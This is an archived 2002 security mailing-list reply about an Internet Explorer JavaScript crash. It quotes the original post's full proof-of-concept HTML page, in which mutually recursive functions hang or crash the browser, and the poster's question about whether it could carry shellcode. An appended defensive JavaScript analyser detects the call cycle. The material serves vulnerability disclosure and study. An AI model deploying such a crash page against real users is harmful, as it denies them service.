RE: Buffer Overflow with all versions of Internet Explorer and Javacript.
From: Patrik Birgersson (float@aiasec.com)
Date: 06/03/02
- Previous message: Nicolas Sigal: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- In reply to: Thor Larholm: "RE: Buffer Overflow with all versions of Internet Explorer and Javacript."
Date: Mon, 3 Jun 2002 23:17:33 +0200 (CEST)
From: Patrik Birgersson <float@aiasec.com>
To: vuln-dev@securityfocus.com

This seems quite familiar to the "Multiple Vendor JavaScript Interpreter
Denial Of Service Vulnerability" reported to Bugtraq in March.
http://online.securityfocus.com/bid/4322
Patrik Birgersson
> -----Original Message-----
> From: Matias Sedalo [mailto:s0t4ipv6@shellcode.com.ar]
> Sent: 2 June 2002 23:08
> To: vuln-dev@securityfocus.com
> Subject: Buffer Overflow with all versions of Internet Explorer and
> Javacript.
>
>
> On 28/07/1999 I discovered a stack buffer overflow which, so far, is caused by
> all versions of Internet Explorer.
> On many Windows 98 machines it makes it necessary to restart the machine, since
> it seems to me that it is left without memory.
> It has only been tested on several version 5 releases of IE on Windows NT
> Server SP6 and Windows 98 Second Edition. As I said before, on Windows 98
> I had to restart it by force.
> Is it possible to execute arbitrary code using the variable company from
> the example?
>
> // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
> // internet Explorer 5.00.3500.1003 on Windows98se
>
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
> var company;
>
> crear();
> address="s0t4ipv6@shellcode.com.ar";
> soporte();
> }
> function soporte(){
> var soporte="bill@mocosoft.com";
> window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
> // window.location=company; // also this line cause the bof.
> close(hacerMail());
> }
> function crear(){
> company="shellcode here?\n"; // i don't think so.
> }
> </script>
> <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
>
> Regards.
>
> - Internet is harmful to your health -
> - Law No. 127.0.0.1
>
> Matias Sedalo
> http://www.shellcode.com.ar
>
> s0t4ipv6@shellcode.com.ar
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> ........................................
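
Added example, not part of either message: in the quoted test page, hacerMail() calls soporte() and soporte() calls hacerMail() again, so one click starts a call chain with no exit. The JavaScript below (the names callGraph and findCycle are made up for this example) finds that cycle statically in a constructed copy of the script. A reported cycle is a flag for review, since the check does not look for a terminating condition.

```javascript
// Constructed copy of the quoted script (placeholder strings); read as text, never run.
const SAMPLE = `
function hacerMail() { var company; crear(); address = "a@example.invalid"; soporte(); }
function soporte() {
  var soporte = "b@example.invalid";
  window.location = "mailto:" + address + "?cc=" + soporte + "&subject=" + company;
  close(hacerMail());
}
function crear() { company = "placeholder"; }
`;

// Map each declared function to the same-script functions its body calls.
function callGraph(src) {
  // Blank out string literals, then comments, so their text is not scanned.
  const clean = src
    .replace(/"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'/g, '""')
    .replace(/\/\/[^\n]*|\/\*[\s\S]*?\*\//g, "");
  const bodies = new Map();
  const decl = /function\s+([A-Za-z_]\w*)\s*\([^)]*\)\s*\{/g;
  for (let m; (m = decl.exec(clean)) !== null; ) {
    let depth = 1, i = decl.lastIndex;
    for (; i < clean.length && depth > 0; i++)
      depth += clean[i] === "{" ? 1 : clean[i] === "}" ? -1 : 0;
    bodies.set(m[1], clean.slice(decl.lastIndex, i - 1));
  }
  const graph = new Map();
  for (const [name, body] of bodies) {
    graph.set(name, [...bodies.keys()].filter((f) =>
      new RegExp("(^|[^\\w.])" + f + "\\s*\\(").test(body)));
  }
  return graph;
}

// Depth-first search; returns the first call cycle as a path, or null.
function findCycle(graph) {
  const state = new Map(), path = []; // state: 1 = on current path, 2 = explored
  const visit = (n) => {
    state.set(n, 1); path.push(n);
    for (const c of graph.get(n)) {
      if (state.get(c) === 1) return [...path.slice(path.indexOf(c)), c];
      if (!state.has(c)) { const r = visit(c); if (r) return r; }
    }
    state.set(n, 2); path.pop(); return null;
  };
  for (const n of graph.keys()) {
    if (!state.has(n)) { const r = visit(n); if (r) return r; }
  }
  return null;
}
```

Calling `findCycle(callGraph(SAMPLE))` returns the path hacerMail, soporte, hacerMail.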